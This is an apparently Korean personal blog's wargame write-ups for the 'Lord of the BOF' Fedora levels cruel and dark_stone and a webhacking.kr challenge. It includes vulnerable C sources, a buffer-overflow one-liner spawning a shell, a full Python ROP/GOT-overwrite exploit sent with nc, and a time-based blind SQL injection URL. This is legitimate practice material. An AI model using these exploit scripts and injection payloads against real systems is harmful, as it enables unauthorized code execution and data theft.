windowhan lab

보던중 딱히 취약점은 보이지 않는다.

보니까 어디서 취약점이 터지지 이러고잇엇는데 마침 format string bug가 일어날 것같은 포스를 풍기는 곳을 발견!

그래서 %p%p를 encode한다음에 decode했는데 취약점이 터졌다.

그런 다음에 스택에 실행권한을 보았다.

스택에 모든 권한이있으므로 이걸 이용해서 FSB로 공부하면되겠다.

EXPLOIT 코드는 기말고사 공부 끝나고올려야지 흐하핳핳 bob붙고 기분이좋네

문제의 소스입니다.

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

모양은 상당히 단순합니다.

하지만 Fedora Core 3 까지는 인자 참조를 할 때, ebp를 참조하지만 Fedora Core 4부터는 esp를 기준으로 참조를 합니다.

(개인적인 생각으로 ebp가 아닌 esp가 기준이되면 스택이 변동될때마다 esp가 달라져서 힘들것같기도한데... 나중에 공부를 해보다보면 이유를 찾을수 있겠죠 ㅋㅋ)

인자로 삼기위해서는 변하지 않으면서, 고정적인 데이터가 필요합니다.

Data Segment에 위치한 데이터를 심볼릭링크를 걸어서 인자로 삼을 수 있겠네요.

(gdb) x/8x $esp
0xbf92401c: 0x007bad7f 0x00000002 0xbf9240a4 0xbf9240b0
0xbf92402c: 0xbf924060 0x00795898 0x007a3878 0xb7f26690
(gdb)
0xbf92403c: 0x00000001 0x008caff4 0x007a2ca0 0x08048454
0xbf92404c: 0xbf924078 0xbf924020 0x007bad44 0x00000000

ret은 pop %eip를 해줌으로써, pop 명령어가 가진 특성으로 인해 esp가 4씩 증가한다는 특징이 있습니다.

대략 ret을 9번쯤하면 esp+4위치에 0x08048454에 위치한 데이터들이 인자로 들어가겠네요.

[dark_stone@Fedora_2ndFloor tmp]$ xxd err | grep cve -A 2
0000000: 6578 6563 7665 2822 2e2f 6372 7565 6c22  execve("./cruel"
0000010: 2c20 5b22 2e2f 6372 7565 6c22 2c20 2261  , ["./cruel", "a
0000020: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa
--
0000680: 3330 300a 6578 6563 7665 2822 5589 e557  300.execve("U..W
0000690: 5653 83ec 0ce8 222c 205b 2222 2c20 2251  VS....", ["", "Q
00006a0: 5c32 3034 5c34 5c31 3051 5c32 3034 5c34  \204\4\10Q\204\4

[dark_stone@Fedora_2ndFloor ~]$ gcc -o `perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x0c\xe8"'` ./tmp/shell.c

[dark_stone@Fedora_2ndFloor ~]$ ./cruel `perl -e 'print "a"x260,"\x51\x84\x04\x08"x9,"\x68\x2d\x83"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQQQQQQQQQh-
sh-3.00$ id
uid=501(cruel) gid=501(cruel) groups=500(dark_stone) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
come on, come over
sh-3.00$

힌트로 제시해준 소스이다.

=============================================================================

=============================================================================

http://webhacking.kr/challenge/web/web-34/index.php?msg=sadf&se=if(ascii(substr(pw,0,1))>0,sleep(100),1)

이런식으로 se에는 '(싱글 쿼터)로 묶여있지 않으므로 if문을 이용해서 timebased blind sql injection을 시도하면 풀린다.

sleep의 인자로 너무 큰 숫자를 주면 서버에 무리가 가니까 적당한 숫자를 인자로 주자.

문제의 소스입니다.

[evil_wizard@Fedora_1stFloor tmp]$ cat ../dark_stone.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - dark_stone
 - Remote BOF on Fedora Core 3
 - hint : GOT overwriting again
 - port : TCP 8888
*/

#include <stdio.h>

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main()
{
 char buffer[256];
 char saved_sfp[4];
 int length;
 char temp[1024];

 printf("dark_stone : how fresh meat you are!\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);

 // for disturbance RET sleding
 length = strlen(temp);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 // buffer cleaning
 memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

 printf("%s\n", buffer);
}

저번 문제와 똑같은 문제지만 저번 문제와 이번문제의 차이는 저번 문제는 local 환경이었고, 이번 문제는 remote환경 이라는 것입니다.

문제 - 4 : http://windowhan.tistory.com/entry/hellfire-evilwizard (저번 문제와 똑같이 풀었습니다.)

제가 쓴 소스입니다.

[evil_wizard@Fedora_1stFloor tmp]$ cat ex.py
#!/usr/bin/python
from struct import pack
import os

printf_plt = 0x08048408
printf_got = 0x0804984c
strcpy_plt = 0x08048438

garget1 = 0x08048484 #0xc0
garget2 = 0x0804838c #0x07
garget3 = 0x080482b4 #0x75
garget4 = 0x0804982c #0x00

b_garget1 = 0x0804872d #h
b_garget2 = 0x08048287 #s
b_garget3 = 0x08048114 #/
b_garget4 = 0x08048720 #n
b_garget5 = 0x0804811d #i
b_garget6 = 0x08048117 #b
b_garget7 = 0x08048114 #/
b_garget8 = 0x0804982c #\x00

func_stack = 0x08049874 #system function address
binsh_stack = 0x8049980 #/bin/sh address
final_binsh_stack = 0x08049ad0
ppr = 0x080484f3 #pop;pop;ret
binsh = 0x00833603 #"/bin/sh"

p = lambda x : pack("<L",x)

payload = ""
payload += "\x90"*268
payload += p(strcpy_plt) + p(ppr) + p(func_stack+0) + p(garget1)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+1) + p(garget2)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+2) + p(garget3)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+3) + p(garget4)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+4) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+5) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+6) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+7) + p(b_garget8)
payload += p(strcpy_plt) + p(ppr) + p(printf_got) + p(func_stack)

payload += p(printf_plt) + "\x90"*4 + p(binsh)

print payload

=========================================================================

[evil_wizard@Fedora_1stFloor tmp]$ (python ex.py;cat)|nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-ps^Hass
/bin/sh: line 3: my-pass: command not found
my-pass
euid = 505
let there be light

==========================================================================

[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat dropped_item.txt
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

==================================================================

07을 찾아야했는데 00을 찾아서 넣어주고 있었네요...

원래 system 함수의 주소는 0x7507c0 인데 0x7500c0으로 넣어서 엉뚱한곳을 실행시키고있었다는..하하..-_-;;

보스몹이 쥐고있던 아이템을 획득했습니다 ㅋㅋ

문제의 소스입니다.